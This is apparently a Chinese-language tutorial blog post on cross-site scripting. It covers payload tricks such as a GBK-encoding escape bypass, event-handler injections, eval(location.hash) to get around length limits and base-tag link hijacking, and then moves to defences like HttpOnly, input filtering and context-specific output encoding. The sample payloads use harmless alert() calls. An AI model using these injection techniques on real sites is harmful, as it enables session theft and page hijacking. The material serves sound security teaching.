      • 81
      • 82
      • 83
      • 84
      • 85
      • 86
      • 87
      • 88
      • 89
      • 90
      • 91
      • 92
      • 93
      • 94
      • 95
      • 96
      • 97
      • 98
      • 99
      • 100
      • 101
      • 102
      • 103
      • 104
      • 105
      • 106
      • 107
      • 108
      • 109
      • 110
      • 111
      • 112
      • 113
      • 114
      • 115
      • 116
      • 117
      • 118
      • 119
      • 120
      • 121
      • 122
      • 123
      • 124
      • 125
      • 126
      • 127
      • 128
      • 129
      • 130
      • 131
      • 132
      • 133
      • 134
      • 135
      • 136
      • 137
      • 138
      • 139
      • 140
      • 141
      • 142
      • 143
      • 144
      • 145
      • 146
      • 147
      • 148
      • 149
      • 150
      • 151
      • 152
      • 153
      • 154
      • 155
      • 156
      • 157
      • 158
      • 159
      • 160
      • 161
      • 162
      • 163
      • 164
      • 165
      • 166
      • 167
      • 168
      • 169
      • 170
      • 171
      • 172
      • 173
      • 174
      • 175
      • 176
      • 177
      • 178
      • 179
      • 180
      • 181
      • 182
      • 183
      • 184
      • 185
      • 186
      • 187
      • 188
      • 189
      • 190
      • 191
      • 192
      • 193
      • 194
      • 195
      • 196
      • 197
      • 198
      • 199
      • 200
      • 201
      • 202
      • 203
      • 204
      • 205
      • 206
      • 207
      • 208
      • 209
      • 210
      • 211
      • 212
      • 213
      • 214
      • 215
      • 216
      • 217
      • 218
      • 219
      • 220
      • 221
      • 222
      • 223
      • 224
      • 225
      • 226
      • 227
      • 228
      • 229
      • 230
      • 231
      • 232
      • 233
      • 234
      • 235
      • 236
      • 237
      • 238
XSS构造技巧
  • 利用字符编码

    在一个<script>标签中输出一个变量,其中转义了双引号:

    var redirectUrl="\";alert(/XSS/);"
    
    • 1

    一般来说这里是没有XSS漏洞的,因为变量位于双引号内,系统转义了双引号。但是百度的返回页面是GBK/GB2312编码的,因此"%c1"这两个字符被组合在一起会成为一个Unicode字符,在Firefox下会认为这是一个字符,所以构造:

    // 构造
    %c1";alert(/xss/);//
    // 页面返回效果
    var redirectUrl = "%c1/";alert(/xss/);//"
    //redirectUrl的值特殊的字符 alert(/xss/);被当做一条可执行的语句存在script标签中构成了xss
    
    • 1
    • 2
    • 3
    • 4
    • 5

    " %c1 “把转义字符” \ "吃掉了,从而绕过检查实施XSS攻击。

  • 绕过长度限制

    存在xss漏洞的攻击点,服务端对该处有逻辑上的长度限制;在有限的长度限定内无法完成自己需要的xss语句构造

    如果服务端对$var变量的长度设置了字符长度限制……攻击者可以利用事件Event来缩短自己xss的字符长度例如:

    " onclick=alert(/xss/)
    
    • 1

    这时候也会鼠标触发事件导致xss的执行

    最好的办法是把XSS Payload写到别处,再通过简短的代码加载这段XSS Payload。

    使用location.hash

    location.hash是一个很好的藏代码的地方,他下载地址栏#符号后面,长度理论上没有限制而且HTTP协议中是不会计算该内容的……

    # URL构造
    http://www.xxx.com/index.html#alert(/xss执行/)
    # 构造xss $var变量的值
    " οnclick="eval(location.hash.substr(1))" 
    
    • 1
    • 2
    • 3
    • 4

    当触发鼠标时间后,就会执行eval函数(执行js代码),调用location.hash的内容且从第一个字符开始(因为第0个字符是符号#)

    特定环境注释绕过长度限制

    xss测试环境下,有两个以及两个以上的可输入的文本框,则可以利用HTML的注释符特性,**将两个文本框之间的HTML代码内容全部注释,**最终将多个文本框之间连通在一起可以实现多字节长度的xss Payload的构造和使用……

  • 使用<base>标签

<base>标签是一种用于定义HTML文档中定义的“相对路径”链接属性源地址的标签;通俗的说:

<img src="/image/2001/9/img_222993.png">
  • 1

这是一个图片标签,使用的是相对地址,默认情况是从当前的位置寻找image文件夹一路追溯找到png图片,但是本地并没有这个png图片,这个图片是从一个图穿网站上找来的,但是没有使用绝对路径导致图片无法加载,而正有几百个img标签存在与这同样的问题;为了方便可以使用标签,定义:

<base href="http://www.xxx.con/">
  • 1

在这个标签之后的所有地址链接都会从这个网站开始构造成一个绝对路径进行追溯文件并加载……

攻击者可以在适当的地方加入<base>标签,导致该标签后的所有链接地址重新定义追溯地址的起点位置,攻击者可以利用这个伪造图片、链接等等……这是一种链接地址劫持

XSS 防御

XSS 存在的根本原因是,对URL中的参数,对用户输入提交给web server的内容,没有进行充分的过滤。如果我们能够在web程序中,对用户提交的URL中的参数,和提交的所有内容,进行充分的过滤,将所有的不合法的参数和输入内容过滤掉,那么就不会导致“在用户的浏览器中执行攻击者自己定制的脚本”。

XSS防御的总体思路是:对输入(和URL参数)进行过滤,对输出进行编码

HttpOnly

XSS 一般利用js脚步读取用户浏览器中的Cookie,而如果在服务器端对 Cookie 设置了HttpOnly 属性,那么js脚本就不能读取到cookie,但是浏览器还是能够正常使用cookie。

HttpOnly是在set-cookie时标记的:

Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]
  • 1
  • 2
  • 3

一般的Cookie都是从document对象中获得的,现在浏览器在设置 Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的 document对象中就看不到Cookie了,而浏览器在浏览的时候不受任何影响

image-20211015164342058
输入检查

对输入和URL参数进行过滤(白名单和黑名单)

输入检查的逻辑,必须放在服务器端代码中实现。如果只是在客户端使用JavaScript进行输入检查,是很容易被攻击者绕过的。目前Web开发的普遍做法,是同时在客户端JavaScript中和服务器端代码中实现相同的输入检查。客户端JavaScript的输入检查,可以阻挡大部分误操作的用户,从而节约服务器资源。

注册用户名、电话、邮件的格式检查

输入检查一般是检查用户输入的数据是否有特殊字符,如<,>,',"等,如果存在字符过滤或者编码

XSS Filter:输入检查匹配XSS的特征,”

输出检查

在变量输出到HTML页面时,可以使用编码或转义的方式来防御XSS攻击。

针对HTML代码的编码方式是HtmlEncode

HtmlEncode并非专有名词,它只是一种函数实现。它的作用是将字符转化成HTMLEntities。

为了对抗XSS,在HtmlEncode中要求至少转换一下字符:

& --> &amp;

< --> &lt;

\> --> &gt;

" --> &quot;

' --> &#x27; $apos;不推荐

/ --> &#x2F; 包含斜杠是因为它可能会闭合一些HTML entity

在PHP中,有htmlentities()和htmlspecialchars()两个函数可以满足安全要求。

htmlspecialchars — 将特殊字符转换为 HTML 实体

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-exfLnPux-1677228779588)()]

htmlentities — 将字符转换为 HTML 转义字符,本函数各方面都和 htmlspecialchars() 一样, 除了 htmlentities() 会转换所有具有 HTML 实体的字符。

JavaScript的编码方式可以使用JavaScriptEncode

JavaScriptEncode与HtmlEncode的编码方式不同,它需要使用反斜杠""对特殊字符进行转义。

在对抗XSS时,还要求输出的变量必须在引号内部,以避免造成安全问题。比较下面两种写法:

var x = escapeJavascript($evil);
var y = '"'+escapeJavascript($evil)+'"';
  • 1
  • 2

如果escapeJavascript()函数只转义了几个危险字符,比如 ’ " < > \ & # 等,那么上面的两行代码输出后可能会变成:

var x = 1;alert(2);
var y = "1;alert(2)";
  • 1
  • 2

第一行执行了额外的代码了;第二行则是安全的。

正确地防御XSS

XSS的本质还是一种"HTML注入",用户的数据被当成了HTML代码一部分来执行,从而混淆了原本的语义,产生了新的语义。

1)、在HTML标签中输出

<div>$var</div>
<a href=# >$var</a>
  • 1
  • 2

所有在标签中输出的变量,如果未做任何处理,都能导致直接产生XSS。

在这种场景下,XSS的利用方式一般是构造一个

<div><script>alert(/xss/)</script></div>
或者
<a href=# ><img src=# onerror=alert(1) /></a>
  • 1
  • 2
  • 3

防御方法是对变量使用HtmlEncode

(2)、在HTML属性中输出

<div id="abc" name="$var" ></div>
  • 1

与在HTML标签中输出类似,可能的攻击方式是:

<div id="abc" name=""><script>alert(/xss/)</script><""></div>
  • 1

防御方法也是采用HtmlEncode

在OWASP ESAPI中推荐了一种更严格的HtmlEncode——除了字母、数字外,其他所有的特殊字符都被编码成HTMLEntities

String safe = ESAPI.encoder().encodeForHTMLAttribute(request.getParameter("input"));
  • 1

这种严格的编码方式,可以保证不会出现任何安全问题。

(3)、在

<script>
var x = "$var";
</script>
  • 1
  • 2
  • 3

攻击者需要先闭合引号才能实施XSS攻击:

<script>
var x= "";alert(/xss/);//";
</script>
  • 1
  • 2
  • 3

防御时使用JavascriptEncode

(4)、在事件中输出

在事件中输出和在

<a href=# onclick="funcA('$var')" >test</a>
  • 1

可能的攻击方法:

<a href=# onclick="funcA('');alert(/xss/);//')" >test</a>
  • 1

在防御时需要使用JavascriptEncode

(5)、在CSS中输出

在CSS和style、style attribute中形成XSS的方式非常多元化,参考下面几个XSS的例子:

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>li {list-style-image: url("javascript:alert('xss')");}>/STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

所以,一般来说,尽可能禁止用户可控制的变量在"

String safe = ESAPI.encoder().encodeForCSS(request.getParameter("input"));
  • 1

其实现原理类似于ESAPI.encoder().encoderForJavaScript()函数,除了字母、数字外的所有字符都被编码成十六进制形式"\uHH"

(6)、在地址中输出

一般来说,在URL的path(路径)或者search(参数)中输出,使用URLEncode即可。

但是还有一种情况,就是整个URL能够被用户完全控制。这时URL的protocal和Host部分是不能够使用URLEncode的,否则会改变URL的语义。

一个URL的组成如下:

[protocal][host][path][search][hash]

例如:

https://www.evil.com/a/b/c/test?abc=123#ssss
[protocal] = "https://"
[host] = "www.evil.com"
[path] = "/a/b/c/test"
[search] = "?abc=123"
[hash] = "#ssss"
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

在protocal与host中,如果使用严格的URLEncode函数,则会把"

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小丑西瓜9/article/detail/236854
推荐阅读
相关标签